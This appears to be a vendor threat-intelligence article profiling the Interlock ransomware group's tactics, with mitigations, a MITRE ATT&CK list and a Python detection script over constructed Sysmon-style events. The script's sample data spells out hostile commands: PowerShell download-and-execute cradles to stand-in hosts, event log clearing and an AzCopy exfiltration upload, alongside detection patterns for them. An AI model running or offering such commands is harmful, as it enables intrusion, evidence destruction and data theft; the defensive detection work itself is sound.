The Interlock ransomware group has kept a relatively low public profile compared to higher-profile threat actors. Since its emergence, its operations have targeted large organizations. The attacks combine data theft with encryption in a double-extortion strategy designed to coerce payment from victims.
Victims infected by Interlock find their files encrypted with the distinctive “.interlock” extension, accompanied by detailed ransom notes. These notes direct them to structured negotiation portals that often include live chat interfaces or email contacts. A major pressure point is the looming threat of public data exposure through a leak site known as the “Worldwide Secrets Blog,” a tactic designed to compound reputational damage alongside financial extortion.
Interlock’s Command-and-Control (C2) infrastructure is tightly controlled and obfuscated, often using encrypted communication channels. The malware also employs “living off the land” techniques, utilizing legitimate system binaries like rundll32.exe to avoid detection. Obfuscation is further achieved through software packing (notably with PyInstaller) and encrypted payloads.
Key defense evasion strategies include:
- Encrypting malware components with hardcoded passwords so that they are decrypted only at run time.
- Using misleading filenames and mimicking legitimate software products.
- Clearing Windows Event Logs to eliminate forensic traces.
- Exploiting inactive or dormant user accounts to avoid triggering alerts.
Registry modifications and startup persistence tactics also help maintain access to compromised machines. For example, Interlock creates registry run keys or drops .lnk shortcut files into Windows Startup folders.
Target Profile and Geographic Spread

Interlock’s campaigns have a global reach, with confirmed attacks in Canada, Italy, Mexico, and the United States. They target a diverse range of industries, including aerospace and defense, automotive, banking and financial services, construction, consumer goods, education, food and beverage, government and law enforcement, healthcare, media and entertainment, professional services, real estate, technology, and transportation and logistics.
Researchers have noted striking similarities between Interlock and other ransomware families, especially Rhysida, leading to theories that the same underlying actor may have developed both. Links have also been drawn to Vice Society (also known as Vanilla Tempest), a threat group that Microsoft has flagged for deploying INC ransomware against U.S.-based entities.
Technical Capabilities and Infection Vectors

Malware Families Used by the Interlock Group (Source: Cyble Vision)
Interlock’s ransomware is cross-platform, targeting both Windows and FreeBSD environments. This adaptability signals the group’s strong technical acumen. The initial compromise typically starts with Remote Access Trojans (RATs) masquerading as legitimate software updates. Common lures include fake Google Chrome or Microsoft Edge installers. Once launched, these trojans deploy PowerShell scripts, keyloggers, and credential-stealing tools, laying the groundwork for deeper infiltration.
From there, the group moves laterally, primarily over Remote Desktop Protocol (RDP), and uses tools such as AnyDesk and PuTTY to reach further into internal networks; privileges are escalated with the credentials harvested earlier. For exfiltration, the attackers rely on Azure Storage Explorer and AzCopy to transfer stolen data to Azure Blob storage, a technique also used by the Rhysida ransomware group, suggesting potential overlap in infrastructure or personnel.
In a further evolution of its toolkit, Interlock has incorporated data-theft utilities such as LummaStealer and BerserkStealer, improving its ability to harvest credentials and sensitive files before encryption occurs. Delivery has also evolved: the group now uses the ClickFix social-engineering technique, in which a fake CAPTCHA or verification page instructs the user to paste and run a malicious PowerShell command.
Tactics and Techniques Used by Interlock Ransomware Group
Interlock’s methods map onto well-documented attack patterns (the MITRE ATT&CK techniques listed below), using a range of techniques to infiltrate and maintain control over targeted systems. The group typically gains access by stealing login credentials, exploiting security flaws in public-facing applications, or tricking users into downloading malware through deceptive links and fake updates.
Once inside, they execute malicious code using scripting tools and disguised installers. To remain active within compromised networks, they create persistent footholds by modifying system settings and leveraging existing user accounts. Interlock also escalates its privileges through these compromised credentials and manipulates startup processes to maintain access.
To avoid detection, the group hides its activity through file obfuscation, software disguise, and system log clearing. Finally, sensitive data is extracted using cloud-based tools, allowing the attackers to store stolen information externally as part of their extortion strategy.
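The chain described in the preceding sections (fake browser updaters run from a download folder, PowerShell download cradles, rundll32.exe loading a DLL from a user-writable path, Run-key and Startup-folder persistence, ClickFix pastes into the Run dialog, event log clearing and AzCopy uploads to Azure Blob storage) is what an EDR or SIEM rule set has to catch. The following is an added example written for this page, not Cyble's or Interlock's code. It runs a small rule set over constructed Sysmon-style events (field names, hostnames, paths and the example.invalid URLs are all assumptions made for the demo) and escalates only hosts that show several distinct techniques, since a single rundll32 or PowerShell event is noise on its own. Technique IDs not in the page's own MITRE list (T1070.001 for log clearing, T1567.002 for cloud-storage exfiltration) are the standard ATT&CK IDs for those behaviours.

```python
"""Rule-based triage of Sysmon-style endpoint events for the Interlock behaviours described above."""
import re

# Constructed sample telemetry (not real victim data). "id" follows Sysmon event IDs:
# 1 = process create, 11 = file create, 13 = registry value set.
SAMPLE_EVENTS = [
    {"id": 1, "host": "WS01", "image": r"C:\Users\alice\AppData\Local\Temp\ChromeUpdate.exe",
     "cmdline": "ChromeUpdate.exe"},
    {"id": 1, "host": "WS01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')\""},
    {"id": 1, "host": "WS01", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\alice\AppData\Roaming\conhost.dll,Start"},
    {"id": 13, "host": "WS01", "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"rundll32.exe C:\Users\alice\AppData\Roaming\conhost.dll,Start"},
    {"id": 11, "host": "WS01",
     "target": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    {"id": 13, "host": "WS02", "target": r"HKU\S-1-5-21-2\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a",
     "details": "powershell -w hidden -c iex(irm http://example.invalid/captcha)\\1"},
    {"id": 1, "host": "SRV01", "image": r"C:\Windows\System32\wevtutil.exe", "cmdline": "wevtutil cl Security"},
    {"id": 1, "host": "SRV01", "image": r"C:\Tools\azcopy.exe",
     "cmdline": 'azcopy copy "D:\\Shares\\Finance" "https://exfil.blob.core.windows.net/c?sv=2022" --recursive'},
    # Benign activity the rules must leave alone.
    {"id": 1, "host": "WS03", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"id": 1, "host": "WS03", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
]

USER_WRITABLE = re.compile(r"\\(Users|ProgramData|Windows\\Temp)\\", re.I)
DROP_DIR = re.compile(r"\\(Temp|Downloads)\\", re.I)          # heuristic: legit updaters do not run from here
BROWSER_NAME = re.compile(r"(chrome|edge).*\.exe$", re.I)
RUNDLL_ARG = re.compile(r"rundll32(\.exe)?\s+\"?([^,\"]+\.dll)", re.I)
PS_CRADLE = re.compile(r"(\bIEX\b|Invoke-Expression|DownloadString|\birm\b|\biwr\b|Invoke-WebRequest|\s-enc\w*\s)", re.I)
LOG_CLEAR = re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b", re.I)
AZURE_BLOB = re.compile(r"\.blob\.core\.windows\.net", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\(Run|RunOnce)\\", re.I)
RUNMRU = re.compile(r"\\Explorer\\RunMRU\\", re.I)           # Run-dialog history, written by ClickFix pastes
INTERPRETER = re.compile(r"\b(powershell|pwsh|mshta|cmd|cscript|wscript)\b", re.I)
STARTUP_LNK = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.I)


def classify(ev):
    """Map one event to an ATT&CK technique ID and reason, or None when nothing matches."""
    if ev["id"] == 1:
        exe = ev["image"].rsplit("\\", 1)[-1].lower()
        cmd = ev.get("cmdline", "")
        if BROWSER_NAME.search(exe) and DROP_DIR.search(ev["image"]):
            return "T1036.005", "browser-updater lookalike launched from Temp/Downloads"
        if exe == "rundll32.exe":
            m = RUNDLL_ARG.search(cmd)
            if m and USER_WRITABLE.search(m.group(2)):
                return "T1129", "rundll32 loading a DLL from a user-writable path"
        if exe in ("powershell.exe", "pwsh.exe") and PS_CRADLE.search(cmd):
            return "T1059.001", "PowerShell download cradle or encoded command"
        if exe == "wevtutil.exe" and LOG_CLEAR.search(cmd):
            return "T1070.001", "Windows Event Log cleared"
        if exe in ("azcopy.exe", "storageexplorer.exe") and AZURE_BLOB.search(cmd):
            return "T1567.002", "bulk copy to Azure Blob storage"
    elif ev["id"] == 13:
        if RUN_KEY.search(ev["target"]):
            return "T1547.001", "value written under a Run/RunOnce key"
        if RUNMRU.search(ev["target"]) and INTERPRETER.search(ev.get("details", "")):
            return "T1204", "script interpreter in Run-dialog history (ClickFix-style paste)"
    elif ev["id"] == 11 and STARTUP_LNK.search(ev["target"]):
        return "T1547.001", "shortcut dropped into a Startup folder"
    return None


def triage(events):
    """Return one finding per matching event, in event order."""
    findings = []
    for ev in events:
        hit = classify(ev)
        if hit:
            findings.append({"host": ev["host"], "technique": hit[0], "reason": hit[1]})
    return findings


def hosts_to_escalate(findings, min_techniques=3):
    """Hosts showing at least min_techniques distinct techniques: the chain, not one odd event."""
    seen = {}
    for f in findings:
        seen.setdefault(f["host"], set()).add(f["technique"])
    return sorted(h for h, t in seen.items() if len(t) >= min_techniques)


if __name__ == "__main__":
    results = triage(SAMPLE_EVENTS)
    for f in results:
        print(f"{f['host']:6} {f['technique']:10} {f['reason']}")
    print("escalate:", hosts_to_escalate(results))
```

On the constructed sample, WS01 trips four distinct techniques (lookalike updater, PowerShell cradle, rundll32 with a user-path DLL, Run-key and Startup persistence) and is the only host escalated; SRV01 shows log clearing plus an AzCopy upload, which in practice you would want to escalate at a lower threshold because those two together are late-stage. The benign rundll32 call against shell32.dll and the plain `Get-Process` invocation are left alone, which is the point of keying on the DLL's path and the cradle keywords rather than on the binary name.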
Conclusion
Interlock is a stealthy ransomware group known for targeting critical sectors with double-extortion tactics. It uses fake software updates, stolen credentials, and cloud exfiltration to pressure victims into paying. Victims also face the threat of public exposure via Interlock’s leak site, adding reputational pressure to the financial demand.
Cyble offers a powerful defense against threats like Interlock ransomware. As a global leader in AI-driven threat intelligence, Cyble equips organizations with real-time insights, dark web monitoring, and attack surface management through platforms like Cyble Vision. Its cutting-edge capabilities help enterprises, government, and law enforcement stay protected from ransomware groups like Interlock, making Cyble an essential partner in modern cybersecurity.
Mitigation and Defense Strategies
- Implement Advanced Email and Web Filtering: Deploy secure email gateways and web filters to block phishing emails and malicious URLs.
- Apply Strict Access Controls and Monitor Inactive Accounts: Regularly audit user accounts, especially inactive ones, and enforce strong, unique passwords combined with multi-factor authentication (MFA) to reduce the risk of credential abuse.
- Harden Remote Access and Monitor RDP Usage: Disable Remote Desktop Protocol (RDP) where not necessary. For legitimate use, restrict access through VPN, enforce MFA, and log all remote access activity to detect abnormal behavior early.
- Deploy Endpoint Detection and Response (EDR) Solutions: Use EDR to identify and neutralize living-off-the-land tactics like PowerShell misuse or registry manipulation. Real-time detection tools can flag obfuscated files and unauthorized system changes.
- Back Up Data and Test Restoration Processes: Maintain regular, offline backups of critical data and verify restoration capabilities. Ensure backups are protected from modification or deletion by ransomware actors.
- Patch and Update Systems Promptly: Close security gaps by applying updates and patches to operating systems, applications, and publicly exposed services—especially those hosting business-critical operations.
MITRE ATT&CK Techniques Associated with the Interlock Ransomware Group

- [Initial Access] Valid Accounts (T1078): Adversaries abuse compromised credentials to gain access, bypassing security controls.
- [Initial Access] Drive-by Compromise (T1189): The victim is lured into downloading a malicious file from a compromised legitimate website.
- [Initial Access] Exploit Public-Facing Application (T1190): Weaknesses in internet-facing hosts or systems, such as software bugs or misconfigurations, are used to gain network access.
- [Execution] PowerShell (T1059.001): The RAT executes PowerShell scripts to download and run further malware.
- [Execution] Shared Modules (T1129): DLL files are executed via rundll32.exe to facilitate malware execution.
- [Execution] User Execution (T1204): Victims manually run files they believe are safe.
- [Persistence] Valid Accounts (T1078): Compromised credentials are used for persistent access to systems, including VPNs and remote desktop.
- [Persistence] Registry Run Keys/Startup Folder (T1547.001): Shortcut files or registry run keys ensure persistence across reboots.
- [Privilege Escalation] Valid Accounts (T1078): Compromised credentials are used to escalate privileges.
- [Privilege Escalation] Registry Run Keys/Startup Folder (T1547.001): The same run keys and shortcut files relaunch the payload after each reboot.
- [Defense Evasion] Obfuscated Files or Information (T1027): Malware components are encrypted and decrypted with hardcoded passwords before execution.
- [Defense Evasion] Software Packing (T1027.002): Fake updaters are packed with PyInstaller for added obfuscation.
- [Defense Evasion] Match Legitimate Name or Location (T1036.005): Fake updaters mimic legitimate products to gain user trust.
- [Defense Evasion] Disable or Modify Tools (T1562.001): EDR tools are disabled using system drivers.
- [Defense Evasion] Reflective Code Loading (T1620): Payloads are executed in memory through Invoke-Expression.
- [Discovery] System Service Discovery (T1007): Adversaries gather information about local system services using tools or OS utility commands.
- [Discovery] System Network Connections Discovery (T1049): Adversaries list network connections to or from compromised systems to gather more information.